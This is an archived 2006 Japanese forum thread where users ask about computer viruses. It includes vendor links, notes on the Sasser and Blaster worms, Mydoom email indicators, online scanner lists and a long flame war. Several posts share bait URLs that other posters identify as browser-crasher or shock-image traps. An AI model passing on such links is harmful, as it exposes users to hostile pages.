ウィルス情報質問 総合スレッド★Part39

このエントリーをはてなブックマークに追加
1名無しさん@お腹いっぱい。
前スレ
【ウィルス情報質問 総合スレッド★Part38】
http://pc8.2ch.net/test/read.cgi/sec/1159190902/


テンプレ
【使用OS】
【WINDOWS UPDATE】
【ウィルスソフト】
【UPDATE】
【スキャン】
【症状】
【やったこと】
【とった処置】
2名無しさん@お腹いっぱい。:2006/11/15(水) 10:50:33
■■ウィルス定義データは定期的に更新しよう■■
メーカー製パソコンにはウィルス監視ソフトがプリインストールされていることが多いです。
しかし、それだけでは万全ではありません。なぜなら、新しいウィルスが次々と登場するからです!
監視ソフトのデータベースに無ければ、新しいウィルスは検出できません。
そのため、ウィルス監視ソフトには 「データの更新」機能が用意されています。
監視ソフトのメーカーのコンピューターに接続し、最新のウィルス情報を手に入れることが重要なのです。

最近出来た新しいウィルスは、ウィルスデータを更新していなければ検出できません。
ウィルス監視ソフトを導入しているからと安心せず、必ず定期的にデータの更新を行ないましょう!
データ更新をしなければ、監視ソフトも役に立ちません。

■■ワクチンメーカーリンク集■■  ※ウィルス監視ソフトをワクチンソフトとも呼びます。

・トレンドマイクロ株式会社 http://www.trendmicro.com/jp/home/personal.htm
 製品名:ウイルスバスター2006インターネットセキュリティ他
・株式会社シマンテック http://www.symantec.com/region/jp/
 製品名:NortonAntiVirus、NortonInternetSecurity他
・VINTAGE SOLUTIONS, INC (バーテックスリンクより移管)
http://www.vintage-solutions.com/Japanese/
 製品名:ANTIDOTE (アンチドート)
・株式会社アラジンジャパン http://www.aladdin.co.jp
 製品名:eSafeProtect
・コンピュータアソシエイツ株式会社 http://www.caj.co.jp/
 製品名:InocuLAN、CheyenneAntiVirus
・マカフィー株式会社 http://www.mcafee.com/jp/default.asp
 製品名:McAfee VirusScan
※プリインストール版のMcAfee VirusScanは、古いバージョンのデータ更新が打ち切られています。
 http://www.nai.com/japan/download/dat3end.asp (リンク切れ)
 該当する場合は諦めてノートンかウィルスバスターを買いましょう。
3名無しさん@お腹いっぱい。:2006/11/15(水) 10:51:04
■■ウィルスに感染しないために■■
★ウィルス監視ソフトを常駐させよう。
 →常に見張っていてくれる監視ソフトを導入すれば、あなたの負担もグッと減ります。
★知らない人から届いた添付ファイルに注意!
 →知らない人からファイルをもらう理由はありません。
★添付ファイルのファイル名だけで信用しない!
 →ファイル名だけでは中身は分かりません。
★知り合いからの添付ファイルでも、注意しよう!
 →アドレス帳に登録されている人に送信するウィルスもあるので注意が必要です。
★怪しいファイルをダウンロードしない。
 →怪しいファイルにウィルスが混入しているケースもよくあることです。
  怪しいファイルや違法性のあるファイルはダウンロードしないようにしましょう。
■■ウィルスを発見・感染したら届け出を! ■■
 もしウィルスを発見したり、感染してしまったら届け出をしましょう!
★IPAセキュリティセンター コンピュータウイルスに関する届出について
 http://www.ipa.go.jp/security/outline/todokede-j.html
 こちらに届け出の方法などが記載されています。
 E-mail・郵送・FAXが利用できますので、ぜひ届け出ましょう。
4名無しさん@お腹いっぱい。:2006/11/15(水) 10:51:37
W32.Sasser.Wormとその亜種にご注意!!
このウイルスは、MS04-011 の悪用を試みるワームです。
ランダムに選択された IPアドレスを持つコンピュータを走査し、拡散します。
亜種も出現しているので、 出現後にウイルス監視ソフトの定義ファイルを 更新していない場合、 ウイルススキャンで検出できません。
最新の定義ファイルに更新しましょう。
●症状
ネットワークの反応が遅く、 メッセージボックスのシャットダウンへのカウントダウンが始まります。
下に「lsass.exeの異常終了です」などと表示されます。
もし「RPCの異常終了です」ならば、次のBlaster/Welchiaです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。
●予防策
MS04-011のパッチを適用する。
http://www.microsoft.com/japan/technet/security/bulletin/MS04-011.mspx
●下記サイトにも情報が掲載されているので、参照して下さい。
Sasser ワームについてのお知らせ
http://www.microsoft.com/japan/security/incident/sasser.mspx
* Windows XP編
http://www.microsoft.com/japan/security/incident/sasser_xp.mspx
* Windows 2000編
http://www.microsoft.com/japan/security/incident/sasser_2k.mspx
* シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.worm.html
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.sasser.b.worm.html
* トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.A
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.B
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.C
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_SASSER.D
5名無しさん@お腹いっぱい。:2006/11/15(水) 10:52:30
Blaster / Welchia についての情報
このウイルスは、MS03-026 の悪用を試みるワームです。
●症状
ネットワークの反応が遅く、
シャットダウンへのカウントダウンが始まります。
メッセージボックスの下に「RPCの異常終了です」などと表示されます。
もし「lsass.exeの異常終了です」ならば、上のSasserです。
「スタート」メニュー→「ファイル名を指定して実行」に
shutdown -a と入力し、[OK] する。これでカウントダウンは止まります。

Blasterにはいくつかの亜種があります。
マイクロソフトの解説ページ
http://www.microsoft.com/japan/technet/security/virus/blaster.asp
Blaster トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_MSBLAST.A
Blaster シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.blaster.worm.html
Welchia トレンドマイクロ
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_NACHI.A
Welchia シマンテック
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.welchia.worm.html
6名無しさん@お腹いっぱい。:2006/11/15(水) 10:53:00
「W32/Netsky」ウイルスの亜種(Netsky.Q)に関する情報
http://www.ipa.go.jp/security/topics/newvirus/netsky-q.html
・差出人アドレスは詐称されます。
・件名: 以下のいずれかひとつ
  * Mail Delivery System (<受取人メールアドレス>)
  * Failure (<受取人メールアドレス>)
  * Delivered Message (<受取人メールアドレス>)
  * Deliver Mail (<受取人メールアドレス>)
  * Delivery Error (<受取人メールアドレス>)
・添付ファイル名: { message、data、mail、msg } + { ランダムな数字、なし } + { .pif , .zip }
   例: date7386.pif 、 message19392.zip など

「W32/Mydoom」(別名:Novarg)ウイルスに関する情報
http://www.ipa.go.jp/security/topics/newvirus/mydoom.html
・差出人アドレス(From): コンピュータから取得できたアドレスを詐称。
・件名:(以下の候補のいずれかを選択)
  * Error
  * Status
  * Server Report
  * Mail Transaction Failed
  * Mail Delivery System
  * hello
  * hi
  [ 任意の文字列 ]
・本文:(以下の候補のいずれかを選択)
  "test"
  "The message contains Unicode characters and has been sent as a binary attachment."
  "The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment."
  "Mail transaction failed. Partial message is available."
  [ 任意の文字列 ]  [ 空白 ]
・添付ファイル名: ランダムなアルファベット
7名無しさん@お腹いっぱい。:2006/11/15(水) 10:53:32
「既出です」Q&A
Q1.ノートンを使っていたら、2chのログからウィルスを発見しました。
   ノートンをインストールしたら2chに書けなくなりました。
A1.ここを読みましょう。
http://info.2ch.net/wiki/pukiwiki.php?%A5%CE%A1%BC%A5%C8%A5%F3%C6%FE%A4%EC%A4%BF%A4%E9%A3%B2ch%A4%CB%BD%F1%A4%AD%A4%B3%A4%E1%A4%CA%A4%A4%BF%CD%A4%D8

Q2.ウィルスを検出しましたが、どんなウィルスかわかりません
A2.各アンチウィルスベンダーのウィルス情報をまず確認しましょう。
・Symantec Security Response
http://www.symantec.com/region/jp/sarcj/vinfodb.html
・Trend Micro ウイルス情報
http://www.trendmicro.co.jp/vinfo/virusencyclo/default.asp
・McAfee ウイルス情報
http://www.mcafeesecurity.com/japan/security/vlibrary.asp

Q3.「世界の中心で生まれてきてすいません」という表示が出てきました 。
  デスクトップの背景が蓮画像になってしまいます 。
A3.Winny関連ウィルスですので、Download板へどうぞ。
  ブラクラに仕込まれている場合もあるので、心当たりがなくても一度参照して下さい。
Winnyを狙ったワーム・ウイルス情報 Part54
http://tmp6.2ch.net/test/read.cgi/download/1146159356/

Q4.アンチウィルスソフトを持っていないのですが、無料のものはないですか?
A4.このスレでフリーのアンチウィルスソフトを取り扱っていますので確認して下さい。
フリーのアンチウイルスソフト Part8
http://pc8.2ch.net/test/read.cgi/sec/1146906473/

Q5.ホームページが変なページになってしまいます
A5.ウィルスではなくスパイウェアですので、こちらへどうぞ
エロサイトを見たら…助けてください!Part62
http://pc7.2ch.net/test/read.cgi/pcqa/1150380799/
8名無しさん@お腹いっぱい。:2006/11/15(水) 10:54:09
関連スレッド
Winnyを狙ったワーム・ニュイルス情報 Part56
http://tmp6.2ch.net/test/read.cgi/download/1156596132/
sasser【スタコラサッサ】sasser Part2
http://pc5.2ch.net/test/read.cgi/sec/1083839516/
Blasterスレ part5
http://pc8.2ch.net/test/read.cgi/sec/1065964513/
【緊急!】ウィルス即行駆除方法【助けて!】
http://pc8.2ch.net/test/read.cgi/sec/1091174837/
アンチウィルスソフトのウィルス誤検出
http://pc8.2ch.net/test/read.cgi/sec/1027753135/
毎日ウィルスメールが送られてくるのですが・・2通目
http://pc8.2ch.net/test/read.cgi/sec/1086494732/


関連スレは次スレに移行してる場合もあります。


質問する前に検索しましょう
http://www.yahoo.co.jp/
http://www.google.co.jp/
9名無しさん@お腹いっぱい。:2006/11/15(水) 10:55:18
テンプレここまで

       ∧_∧
      ( ・∀・)   トロイ〜ワーム!!!
      ( ⊃┳⊃
     ε(_)ヘ⌒ヽフ
     (   ( ・ω・)
≡≡≡ ◎―◎⊃⊃


テンプレここまで
10名無しさん@お腹いっぱい。:2006/11/15(水) 11:09:01
前スレの質問の続きです。
avast!4.7を使っていますが、
踏むとウィルスに感染するURLを踏んだ場合、


踏む→感染→avastが検出→削除→削除はできたがPCに有害
     ↑
ここでPCに害をもたらす(削除するまでの間に)


これが私の見解です。
それともavastが入っているので感染しないので無害なのでしょうか?
ご回答宜しくお願いします。
11名無しさん@お腹いっぱい。:2006/11/15(水) 11:19:13
ttp://www.kaspersky.co.jp/scanforvirus/
カスペオンラインスキャン
12名無しさん@お腹いっぱい。:2006/11/15(水) 11:28:47
http://pc8.2ch.net/test/read.cgi/sec/1031073684/
オンラインによるウイルスチェックサービス
13名無しさん@お腹いっぱい。:2006/11/15(水) 13:00:07
http://www2.strangeworld.org/uedakana/
カスペルスキー アンチウィルス【フリー版】 06/11/10公開
14名無しさん@お腹いっぱい。:2006/11/15(水) 13:01:58
>>13
氏ね
15名無しさん@お腹いっぱい。:2006/11/15(水) 13:31:50
headline-news.tripod.com と strangeworld はブラクラ登録推奨
16名無しさん@お腹いっぱい。:2006/11/15(水) 13:36:15
newsheadline.tripod.comもな
17名無しさん@お腹いっぱい。:2006/11/15(水) 16:13:50
前スレでリンクチェッカーを知りました。
で、さっそく使いたいのですが、スレイプ似るでもOKですか?
なぜか右クリックしても、Dr.WEB で検査、の表示が出ていません。
プ似るでの設定方法を御教示ください。
18名無しさん@お腹いっぱい。:2006/11/15(水) 17:27:08
ここ実質40な
ウィルス情報質問 総合スレッド★Part38
http://pc8.2ch.net/test/read.cgi/sec/1155716176/
ウィルス情報質問 総合スレッド★Part38
http://pc8.2ch.net/test/read.cgi/sec/1159190902/
19名無しさん@お腹いっぱい。:2006/11/15(水) 17:29:30
>>10
前スレ嫁バカ
20名無しさん@お腹いっぱい。:2006/11/15(水) 20:01:45
>>10
Avast!に限らず、どのアンチウイルスソフトでも安全とは言い切れない。
だから、少しでもリスクを低減したい人は、以下のようなセキュリティ環境で対応。
・高検出力の非・常駐アンチウイルスソフト
・非・常駐アンチスパイウェアソフト(検出・駆除・予防)
・IEエンジン以外のブラウザ
・PFW(アウトバウンド監視)
君の場合は、まず知識不足を補おうとする自助努力が足りないんじゃない?
Avast!はWeb閲覧時、マルウェアの侵入をブロックするWebシールド機能が
あるはず、ブロックできれば感染しないし・無害。リンク先のマルウェアの有無を確かめる
ことはできない。というかそういった機能をもったアンチウイルスソフトはないん
じゃないかな?必要なら、前スレで紹介されたものを利用するしかない。
>>17
IE用をインストールして再起動すれば使えると思うけど。
できなかったとしても、Sleipnirの右クリックメニューが弄くれれば・・・
私はOperaと2ch専ブラから利用、外出先のノーガードPC利用時には↓でチェック。
http://online.drweb.com/?url=1
21通りすがり:2006/11/15(水) 20:26:06
あーあ、いい事言ってるのに

>君の場合は、まず知識不足を補おうとする自助努力が足りないんじゃない?

このひとことが

「おれって物知りでやるだろ」

的な状態をよくあらわしちゃってるよ〜
能ある鷹は爪を隠す、というではないか。
無知な相手に威張ったところで、なにも得られるものはない。
もっと大物になってほしい。
2217:2006/11/15(水) 21:16:50
>20
ありがとう
23名無しさん@お腹いっぱい。:2006/11/15(水) 21:18:51
>>21
何故そういった解釈しかできない
まぁ正直、何の見返りもない慈善行為に精を出すほどできた人間ではないので
優越感に浸っていることは否定しないけど。
レスをつける相手にもよるが、これも2chQ&A掲示板特有のgive & takeということで
許してほしい _ト ̄|○
24名無しさん@お腹いっぱい。:2006/11/15(水) 21:28:04
>>23
>何故そういった解釈しかできない

簡単な事さ。

>give & take

2ちゃんに限らず、世の中は最低でも give & take ばかり。
あんたは博識だ。ゆえに give & give ができる人間になってほしかった。

優越感という感情は

「善良という名の精神を滅ぼす麻薬」

のような快感だけであることに気付いてほしかった。
それだけのことさ。
25名無しさん@お腹いっぱい。:2006/11/15(水) 21:35:17

ウィルス情報質問 総合スレッド★Part39
26名無しさん@お腹いっぱい。:2006/11/15(水) 22:10:22
>>24
私の将来を案じてくれるのはありがたいが、優越感無しに生きれると
信じれるほどまっさらな人間ではないので、残念ながら手遅れです。
博識でも無いし、Give&Giveでは今日の夕食すら危うい人間です。
人の善意をそのままに受け取れない君の将来のほうが不安で仕方ありません。
スレ汚し&駄文申し訳ありませんでした。
27名無しさん@お腹いっぱい。:2006/11/15(水) 22:20:15
>>26
>人の善意をそのままに受け取れない

なるほど。自分のした行為が真の善意か偽善か見極められない人物だったか。
どうやら、おれの思い込み違いだったようだな。

おれの将来を心配してくれてありがとう。
おれは馬鹿で単細胞で無知な男だ。
だが、それでもおれを愛してくれるやつらがいるのでおれは幸せだと思ってる。

では、おれもこれにて失礼するよ。さらばじゃ。
28名無しさん@お腹いっぱい。:2006/11/15(水) 22:26:15
>>11-12あるみたいだけど
一応 前スレから


257 :名無しさん@お腹いっぱい。:2006/10/17(火) 23:36:06 Panda ActiveScan - Free Antivirus Online
http://www.pandasoftware.com/activescan/jp/activescan_principal.htm
削除可
シマンテック・セキュリティチェック
http://www.symantec.com/region/jp/securitycheck/index.html
ウイルスバスターオンラインスキャン
http://www.trendmicro.co.jp/hcall/index.asp
カスペルスキー:オンライン ウイルス&スパイウェアスキャナ 
http://www.kaspersky.co.jp/scanforvirus/
トレンド フレックス
http://trendflexsecurity.jp/free_security_tools/housecall_free_scan.php
削除可
F-Secure オンラインスキャナ
http://www.f-secure.co.jp/v-descs/disinfestation.html
ウイルスチェイサー for WEB
http://www.viruschaser.jp/support_online.html

これくらいしか思いつかんかった
参考にどうぞ 改良なりして次スレのテンプレにでもいれるとよろしいかと


259 :名無しさん@お腹いっぱい。:2006/10/18(水) 00:12:28
っ BitDefender Online Scanner
http://www.bitdefender.com/scan8/ie.html
削除可
29名無しさん@お腹いっぱい。:2006/11/15(水) 22:37:29

 乙であります
30名無しさん@お腹いっぱい。:2006/11/15(水) 22:41:58
>>28
( ^ω^)乙だお♪
31名無しさん@お腹いっぱい。:2006/11/15(水) 23:11:32
>>27
スレ汚しついでに更に汚します。
あらゆる行為において内在的に優越感というものはあります。
善意というものは結果的に相手をよい方向に導くということであって、
そこに優越感や自慰的行為であっても悪いことではありません。
すなわち、他者から偽善であるといわれようが結果的に善意になれば
いいのです。そもそも見ず知らずの相手に対する善意は偽善と
思ってもかまいません。「真の善意」「善良という名の精神を滅ぼす麻薬」
といった陳腐な言葉に酔いしれていないで、もっと内面を見つめ直したほうが
いいと思いますよ。もちろんこれは、悪意も含んでます。
32名無しさん@お腹いっぱい。:2006/11/15(水) 23:24:44
セキュ板でやるな
33名無しさん@お腹いっぱい。:2006/11/15(水) 23:31:03
>>31
おまいは根本的な事を勘違いしてる。
>>27は、おまいの内面の事を言ってるんだと思うよ。
そして、いま最も正しのは
>>32
>セキュ板でやるな
あはは
3410:2006/11/15(水) 23:44:35
>>19
>>20
すいませんでした。
こういうことですよね。
    ↓
http://newsheadline.tripod.com/sports/20060928-00000025-san-fi.html
35名無しさん@お腹いっぱい。:2006/11/15(水) 23:45:53

ブラクラです
36名無しさん@お腹いっぱい。:2006/11/15(水) 23:52:46
リンクに tripod が入ってる場合は要注意です。^^
3710:2006/11/16(木) 00:00:58
>>34
そうです
3827:2006/11/16(木) 00:09:36
>>33
分かってる。否定してない。
前スレで>>10とやり取りした本人じゃなきゃわからんことを
妙な勘繰りいれて、手前勝手に「大物」「Give&Give」になれとか、図々しいんだよ。
39名無しさん@お腹いっぱい。:2006/11/16(木) 00:12:46
よくさあVIPでやれとかの誘導レスあるけど、これはどこに誘導していいのかわからんなw
4033じゃありません:2006/11/16(木) 00:21:02
>>38
君の悔しい気持ちはわかったので
君もそろそろ、その図々しいやつを見習っておさらばしなよ。シツコスギ
41名無しさん@お腹いっぱい。:2006/11/16(木) 00:32:34
あ〜やってらんね ... 空虚
42名無しさん@お腹いっぱい。:2006/11/16(木) 00:33:15
\               U         /
  \             U        /
             / ̄ ̄ ヽ,
            /        ',      /     _/\/\/\/|_
    \    ノ//, {0}  /¨`ヽ {0} ,ミヽ    /     \          /
     \ / く l   ヽ._.ノ   ', ゝ \       <   バーカ!  >
     / /⌒ リ   `ー'′   ' ⌒\ \    /          \
     (   ̄ ̄⌒          ⌒ ̄ _)    ̄|/\/\/\/ ̄
      ` ̄ ̄`ヽ           /´ ̄
           |            |  
  −−− ‐   ノ           |
          /            ノ        −−−−
         /           ∠_
  −−   |    f\      ノ     ̄`丶.
        |    |  ヽ__ノー─-- 、_   )    − _
.        |  |            /  /
         | |          ,'  /
    /  /  ノ           |   ,'    \
      /   /             |  /      \
   /_ノ /              ,ノ 〈           \
    (  〈              ヽ.__ \        \
     ヽ._>              \__)
43名無しさん@お腹いっぱい。:2006/11/16(木) 00:37:49
そんな気分なときはセクシーショットでも
ttp://sakuratan.ddo.jp/imgboard/img-box/img20061115204016.jpg
44名無しさん@お腹いっぱい。:2006/11/16(木) 00:41:51
(*´д`*)まなべええええええええええええええええええええ
45名無しさん@お腹いっぱい。:2006/11/16(木) 00:45:43
       /⌒ヽ
⊂二二二( ^ω^)二⊃
     |    /       ブーン
      ( ヽノ
      ノ>ノ 
  三  レレ
46名無しさん@お腹いっぱい。:2006/11/16(木) 01:22:14
もう一丁セクシーショット
http://www.transa-na.net/?news/archive/2006/10/11.jpg
47名無しさん@お腹いっぱい。:2006/11/16(木) 01:50:16
-- 「2006/11/14 9:52」のキャッシュをチェックしています。 --
注意!ループタグを発見! (3)
注意!逃げウィンドウを発見! (1)
注意!ゾンビ ウィンドウを発見! (1)
ブラクラチェックが終了しました。

※ windowオープンを発見しました。(8)
payout.htm
http://www.topsites.com.br/cgi-bin/top69/vote?id=2515
payout.htm
※ インラインフレームタグを発見しました。 (2)
analsex-allpics.htm
上記アドレスのチェックもお勧めします。(そのままチェックできます。)
--レスポンスヘッダ--
HTTP/1.1 200 OK
Date: Tue, 14 Nov 2006 00:51:56 GMT
Server: Apache
Accept-Ranges: bytes
Connection: close
Content-Type: text/html; charset=ISO-8859-1
SCO-Hash: 5ab69771c748a6a6aae9ef6189cb5648

[キャッシュ(5.3 KB) 削除 / 検索] [このアドレスの安全度 81%] [RSS]
48名無しさん@お腹いっぱい。:2006/11/16(木) 01:59:05
                          つまんね       (  (
                   ,,.r'' ゛~~` ''ッ,,    ダリィんだよね      )   )
                 、 ゛  ,,,,,,,,,,,,,,,,,,,,, ヾ.  バカアイテニスンノ ,.、   / /
                  ミ   ミ゛,へ.__, ,_ノヽ i.                .| |l   l ,´
                ミ    ミ, ( ・) {・フ 〉 ミ.          _-、i::| |ニニii '
            、,,,,ツi:     ミ,`~´ ヽ~〈  .ミ        /,‐ヽヽ`、||
          、シ``   i:      ,ゞ  'n.inヽ. .ミ          ( .〉〉/
         シ  //      ミ`    l.l ヽ"、         /  ノ
        ミ/ シ           彡 ,=こ二=.{ ミ,,      ,r'´ ,,、'゛
        ミi. /  /       ' ! w、`~^' vwv '、   ミ      〃 .ミ
       .ミ /     i:  /      `^^     \ ."   〃  ミ
      .ミ.:/ / / i:      v    !  ,,   \ 、 〃  ミ
      :i;     .i:   w      !!   ミ!:   ミ \\( ⌒ヽ
      :i;  /   i:      !!       .ミ キ    , ⌒`、_  )  )
      :il     .i:    !    w!    ミ .:i.   (_ (  _,ノ  ) ,
     :il   !  i:           ! ,〃゛  キ    ゞ、 __,  ノ , 
     .:il !   /~~````` " '''' = ‐- 、ミ  _,,,,_ミ,  il `  ー ´
     :il   ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、  ゞ、 `  〃
     ゝ、wx.mn.!!++ナ'~      ヾ~ヽ、 ヽ、 ,, ~^^}´
        彡   〃  〃     }} /〉.〉〉〉i''"   〃
         彡、     {{     〃,__!////l |    〃
           X,,    》.   ≪.__`‐'.' '´,Uwwvw'、...,,,___
            ^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
49名無しさん@お腹いっぱい。:2006/11/16(木) 02:06:49
>>46のリンク先はセクシーショットというより、すでグロの領域
50名無しさん@お腹いっぱい。:2006/11/16(木) 02:17:51
マカフィーのウィルス対策とスパイウェアのやつインストールしたらかなり重くなって少しいらいらします・・・
そんなもんですかね、せっかく光入れたのに。
51名無しさん@お腹いっぱい。:2006/11/16(木) 02:28:00
                                            (  (
                  ,,.r'' ゛~~` ''ッ,,    スレタイヨメヨ        )   )
                、 ゛  ,,,,,,,,,,,,,,,,,,,,, ヾ.            ,.、   / /
                 ミ   ミ゛,へ.__, ,_ノヽ i.                .| |l   l ,´
               ミ    ミ, ( ・) {・フ 〉 ミ.          _-、i::| |ニニii '
           、,,,,ツi:     ミ,`~´ ヽ~〈  .ミ        /,‐ヽヽ`、||
         、シ``   i:      ,ゞ  'n.inヽ. .ミ          ( .〉〉/
        シ  //      ミ`    l.l ヽ"、         /  ノ
       ミ/ シ           彡 ,=こ二=.{ ミ,,      ,r'´ ,,、'゛
       ミi. /  /       ' ! w、`~^' vwv '、   ミ      〃 .ミ
      .ミ /     i:  /      `^^     \ ."   〃  ミ
     .ミ.:/ / / i:      v    !  ,,   \ 、 〃  ミ
     :i;     .i:   w      !!   ミ!:   ミ \\( ⌒ヽ
     :i;  /   i:      !!       .ミ キ    , ⌒`、_  )  )
     :il     .i:    !    w!    ミ .:i.   (_ (  _,ノ  ) ,
    :il   !  i:           ! ,〃゛  キ    ゞ、 __,  ノ , 
    .:il !   /~~````` " '''' = ‐- 、ミ  _,,,,_ミ,  il `  ー ´
    :il   ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、  ゞ、 `  〃
    ゝ、wx.mn.!!++ナ'~      ヾ~ヽ、 ヽ、 ,, ~^^}´
       彡   〃  〃     }} /〉.〉〉〉i''"   〃
        彡、     {{     〃,__!////l |    〃
          X,,    》.   ≪.__`‐'.' '´,Uwwvw'、...,,,___
           ^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
52名無しさん@お腹いっぱい。:2006/11/16(木) 03:15:33
なんか最近、

再起動しますか?

とか聞きながら5分くらいカウントダウンしていくウイルスっぽいのに感染しました><。。
どうしたらいいですかね?
53名無しさん@お腹いっぱい。:2006/11/16(木) 03:16:07
ageておきます
54名無しさん@お腹いっぱい。:2006/11/16(木) 03:27:11
>>52
>>28
とりあえずカスペあたり試してきて報告してちょ。
55名無しさん@お腹いっぱい。:2006/11/16(木) 03:30:32
ゲームをしていてまったく気が付かなかったんですが、
良く見ると警告文らしきものはウインドウズの自動更新後の再起動の通知でした(;´Д`)

以前似たような再起動ウィルスに感染した事があったので、またかと早とちりしてしまいました。

お騒がせしました。吊ってきます・・・
56名無しさん@お腹いっぱい。:2006/11/16(木) 03:34:57
なるほど。吊るほどじゃないよ。
57名無しさん@お腹いっぱい。:2006/11/16(木) 04:30:49
>だが、それでもおれを愛してくれるやつらがいるのでおれは幸せだと思ってる。
                       タシャト ヒカクシタ ウエデノ ユウエツカンニ
                  ,,.r'' ゛~~` ''ッ,,   シアワセヲ カンジテル
                、 ゛  ,,,,,,,,,,,,,,,,,,,,, ヾ.   トイウコト        ,.、   / /
                 ミ   ミ゛,へ.__, ,_ノヽ i.                .| |l   l ,´
               ミ    ミ, ( ・) {・フ 〉 ミ.          _-、i::| |ニニii '
           、,,,,ツi:     ミ,`~´ ヽ~〈  .ミ        /,‐ヽヽ`、||
         、シ``   i:      ,ゞ  'n.inヽ. .ミ          ( .〉〉/
        シ  //      ミ`    l.l ヽ"、         /  ノ
       ミ/ シ           彡 ,=こ二=.{ ミ,,      ,r'´ ,,、'゛
       ミi. /  /       ' ! w、`~^' vwv '、   ミ      〃 .ミ
      .ミ /     i:  /      `^^     \ ."   〃  ミ
     .ミ.:/ / / i:      v    !  ,,   \ 、 〃  ミ
     :i;     .i:   w      !!   ミ!:   ミ \\( ⌒ヽ
     :i;  /   i:      !!       .ミ キ    , ⌒`、_  )  )
     :il     .i:    !    w!    ミ .:i.   (_ (  _,ノ  ) ,
    :il   !  i:           ! ,〃゛  キ    ゞ、 __,  ノ , 
    .:il !   /~~````` " '''' = ‐- 、ミ  _,,,,_ミ,  il `  ー ´
    :il   ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、  ゞ、 `  〃
    ゝ、wx.mn.!!++ナ'~      ヾ~ヽ、 ヽ、 ,, ~^^}´
       彡   〃  〃     }} /〉.〉〉〉i''"   〃
        彡、     {{     〃,__!////l |    〃
          X,,    》.   ≪.__`‐'.' '´,Uwwvw'、...,,,___
           ^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
58名無しさん@お腹いっぱい。:2006/11/16(木) 04:31:21
                        ゼンイト ギゼンハ
                  ,,.r'' ゛~~` ''ッ,,   タシャノ ヒョウカ
                、 ゛  ,,,,,,,,,,,,,,,,,,,,, ヾ.    ヒョウリイッタイ     ,.、   / /
                 ミ   ミ゛,へ.__, ,_ノヽ i.                .| |l   l ,´
               ミ    ミ, ( ・) {・フ 〉 ミ.          _-、i::| |ニニii '
           、,,,,ツi:     ミ,`~´ ヽ~〈  .ミ        /,‐ヽヽ`、||
         、シ``   i:      ,ゞ  'n.inヽ. .ミ          ( .〉〉/
        シ  //      ミ`    l.l ヽ"、         /  ノ
       ミ/ シ           彡 ,=こ二=.{ ミ,,      ,r'´ ,,、'゛
       ミi. /  /       ' ! w、`~^' vwv '、   ミ      〃 .ミ
      .ミ /     i:  /      `^^     \ ."   〃  ミ
     .ミ.:/ / / i:      v    !  ,,   \ 、 〃  ミ
     :i;     .i:   w      !!   ミ!:   ミ \\( ⌒ヽ
     :i;  /   i:      !!       .ミ キ    , ⌒`、_  )  )
     :il     .i:    !    w!    ミ .:i.   (_ (  _,ノ  ) ,
    :il   !  i:           ! ,〃゛  キ    ゞ、 __,  ノ , 
    .:il !   /~~````` " '''' = ‐- 、ミ  _,,,,_ミ,  il `  ー ´
    :il   ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、  ゞ、 `  〃
    ゝ、wx.mn.!!++ナ'~      ヾ~ヽ、 ヽ、 ,, ~^^}´
       彡   〃  〃     }} /〉.〉〉〉i''"   〃
        彡、     {{     〃,__!////l |    〃
          X,,    》.   ≪.__`‐'.' '´,Uwwvw'、...,,,___
           ^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
59名無しさん@お腹いっぱい。:2006/11/16(木) 04:31:53
                  ,,.r'' ゛~~` ''ッ,,   ギゼンシャ?
                、 ゛  ,,,,,,,,,,,,,,,,,,,,, ヾ.   イイデスヨベツニ    ,.、   / /
                 ミ   ミ゛,へ.__, ,_ノヽ i.   アクニテッシマスカラ .| |l   l ,´
               ミ    ミ, ( ・) {・フ 〉 ミ.          _-、i::| |ニニii '
           、,,,,ツi:     ミ,`~´ ヽ~〈  .ミ        /,‐ヽヽ`、||
         、シ``   i:      ,ゞ  'n.inヽ. .ミ          ( .〉〉/
        シ  //      ミ`    l.l ヽ"、         /  ノ
       ミ/ シ           彡 ,=こ二=.{ ミ,,      ,r'´ ,,、'゛
       ミi. /  /       ' ! w、`~^' vwv '、   ミ      〃 .ミ
      .ミ /     i:  /      `^^     \ ."   〃  ミ
     .ミ.:/ / / i:      v    !  ,,   \ 、 〃  ミ
     :i;     .i:   w      !!   ミ!:   ミ \\( ⌒ヽ
     :i;  /   i:      !!       .ミ キ    , ⌒`、_  )  )
     :il     .i:    !    w!    ミ .:i.   (_ (  _,ノ  ) ,
    :il   !  i:           ! ,〃゛  キ    ゞ、 __,  ノ , 
    .:il !   /~~````` " '''' = ‐- 、ミ  _,,,,_ミ,  il `  ー ´
    :il   ´ ―  ̄ - ,,. -‐‐-、、 ヽ. ヾ、  ゞ、 `  〃
    ゝ、wx.mn.!!++ナ'~      ヾ~ヽ、 ヽ、 ,, ~^^}´
       彡   〃  〃     }} /〉.〉〉〉i''"   〃
        彡、     {{     〃,__!////l |    〃
          X,,    》.   ≪.__`‐'.' '´,Uwwvw'、...,,,___
           ^^^^ !wニこ)こ)二)`) (_,,,..- 、...二⊃_).)
60名無しさん@お腹いっぱい。:2006/11/16(木) 04:50:35
どうした?朝からやけに哲学してるな。サル姿がなんだが。
61名無しさん@お腹いっぱい。:2006/11/16(木) 05:00:10
